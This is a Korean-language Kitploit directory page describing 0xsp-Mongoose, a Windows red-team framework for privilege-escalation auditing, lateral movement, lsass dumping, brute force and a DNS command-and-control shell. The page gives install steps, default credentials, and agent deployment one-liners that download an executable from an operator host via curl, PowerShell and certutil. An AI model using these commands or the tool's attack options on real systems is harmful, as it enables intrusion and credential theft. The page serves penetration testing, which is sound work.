Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
0xsp-Mongoose — 사이버 보안 시뮬레이션 및 레드 팀 운영을 위한 독특한 프레임워크로, 최신 취약점, 잘못된 구성 및 권한 상승 공격에 대한 Windows 감사를 수행하며, 네트워크 내 고급 공격자의 전술과 기술을 모방합니다. | Kitploit
도구/GitHubGitHub/zux0x3a/0xsp-mongoose
Privilege EscalationVulnerability ScannersNetwork MappingPassword AttacksExploitationLateral MovementWeb Application ExploitationPost-ExploitationCommand and ControlRed TeamingDNS AnalysisArchived
5341174년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHubzux0x3a/0xsp-mongoose

0xsp-Mongoose

사이버 보안 시뮬레이션 및 레드 팀 운영을 위한 독특한 프레임워크로, 최신 취약점, 잘못된 구성 및 권한 상승 공격에 대한 Windows 감사를 수행하며, 네트워크 내 고급 공격자의 전술과 기술을 모방합니다.

저장소 보기웹사이트

GPLv3 license

지속적인 개발을 위해 프로젝트를 지원하세요 (ETH 0xf340c15c5e669a4ababab856e9f2bccd659d6e42)

Windows용 0xsp Mongoose RED

현재 릴리스 2.2.0

0xsp mongoose red 버전은 사이버 보안 시뮬레이션 중 여러분의 요구를 지원하기 위해 제공됩니다. 이 버전을 사용하면 대상 Windows 운영 체제를 감사하여 시스템 취약점, 잘못된 구성 및 권한 상승 공격을 찾아내고 네트워크에서 고급 공격자의 전술과 기술을 복제할 수 있습니다.

Node.js 지원을 통한 웹 애플리케이션 API로 설치 및 사용자 정의를 적시에 훨씬 쉽게 수행할 수 있습니다. Windows 센서 에이전트는 애플리케이션 API와 통신하여 결과를 전송하고 양방향 기술로 명령을 수신합니다.

에이전트는 windows update api 및 exploit database definitions 모듈을 사용하여 Windows 익스플로잇을 식별하고 탐지할 수 있습니다. 새 릴리스는 다음 취약점도 탐지합니다.

  • CVE-2019-0836
  • CVE-2019-0841
  • CVE-2019-1064
  • CVE-2019-1130
  • CVE-2019-1253
  • CVE-2019-1385
  • CVE-2019-1388
  • CVE-2019-1405
  • CVE-2019-1315
  • CVE-2020-0787
  • CVE-2020-0796
  • CVE-2020-0797
  • CVE-2020-1472
  • CVE-2021-1675

기능

  • Windows 권한 상승 스캐닝 기술.
  • NodeJS로 구축된 웹 애플리케이션
  • sqlite DB 지원
  • 측면 이동 기술. 동영상
  • 양방향 통신 채널.동영상
  • 플러그인 온라인 패키징.
  • 향상된 익스플로잇 탐지 스크립팅 엔진.
  • Windows 계정 무차별 대입 모듈 (로컬/도메인)
  • run-as-user Windows API 함수의 무기화. 동영상
  • 로컬 네트워크 스캔 및 공유 열거.
  • lsass 메모리 덤핑 기술 (플러그인).
  • DNS C2C 인터랙티브 셸 모드

설치

root@kitploit:~
git clone --single-branch --branch 0xsp-red https://github.com/lawrenceamer/0xsp-mongoose 
cd 0xsp-mongoose/ 
npm install 
node index.js

기본 액세스 자격 증명 :

  • 사용자 이름 : admin
  • 비밀번호 : 0xsp

DNS C2C 파이썬 스크립트

root@kitploit:~
touch temp.txt
python3 dns_server.py -d DOMAIN -a PUBLICIP -i INTERFACEIP

에이전트 빠른 배포

root@kitploit:~
#예제 1
curl.exe -o agent.exe http://nodejsip:4000/release/x64.exe
#예제 2
powershell.exe -command (new-object net.webclient).downloadfile('http://nodejsip:4000/release/x64.exe','c:\tmp\agent.exe');
#예제 3
certutil.exe -urlcache -split -f "http://nodejsip:4000/release/x64.exe" agent.exe

사용법

root@kitploit:~
-s --Windows 서비스 및 설치된 드라이버 검색.
-u --사용자, 그룹, 역할 정보 검색.
-c --연결된 드라이버에서 확장자별 민감한 구성 파일 검색.
-n --네트워크 정보, 네트워크 인터페이스, 연결 세부 정보 검색.
-w --쓰기 가능한 디렉터리, 액세스 권한 확인, 변경된 권한 열거.
-i --Windows 시스템 정보, 세션, 항상 상승된 권한 확인 열거.
-l --특정 문자열을 모든 파일에서 검색, 예: agent.exe -l c:\ password *.config.
-o --Node.js 애플리케이션의 호스트 주소 지정, srvhost도 사용 가능
-p --설치된 소프트웨어, 실행 중인 프로세스, 작업 열거.
-e --커널 검사 도구, 도구 데이터베이스에서 Windows 커널 취약점 검색 지원
-x --Node.js 애플리케이션 연결 인증 비밀번호.
-d --대상 머신에 직접 파일 다운로드.
-t --대상 머신에서 Node.js 애플리케이션으로 파일 업로드.
-spooler --단일 호스트 또는 호스트 목록에서 CVE-2021-1675 가능성 스캔 (예: -spooler -srvhost 또는 -spooler -hosts)
-m --알려진 모든 스캔 유형 함께 실행.

[!] 레드 팀 전술 섹션

-r --특정 계정으로 리버스 셸 생성.
-lr --WMI를 사용한 측면 이동 기술 (예: -lr -host 192.168.14.1 -username administrator -password blabla -srvhost nodejsip)
-nds --네트워크 검색 및 공유 열거
-dns --인터랙티브 DNS C2C 셸 구축
-cmd --HTTP 셸을 통해 명령 전송
-interactive --인터랙티브 모드 시작 (예: 플러그인 로딩 등)
-username --특정 공격 모듈의 신원 인증.
-password --특정 공격 모듈의 신원 인증.
-host --공격할 원격 호스트 지정.
-srvhost --Node.js 애플리케이션의 rhost 설정.
-bf --로컬 사용자/도메인 사용자 무차별 대입 모듈
-import --DLL 파일을 로컬로 가져와 실행
-remote --원격 호스트에서 DLL 파일을 가져와 실행

문서

https://0xsp.com/security%20dev/0xsp-mongoose-red

상세 연구 사이트

https://0xsp.com

보안 컨퍼런스

  • Standoff365 - 러시아 (https://standoff365.com/conferences/357)

도구 튜토리얼

0xsp에 대한 새로운 튜토리얼과 트릭이 게시될 때 알림을 받으려면 다음 채널을 구독하세요. https://www.youtube.com/channel/UCoEr6Qsyd6oMsPmaJPQ_FOg

도구 다운로드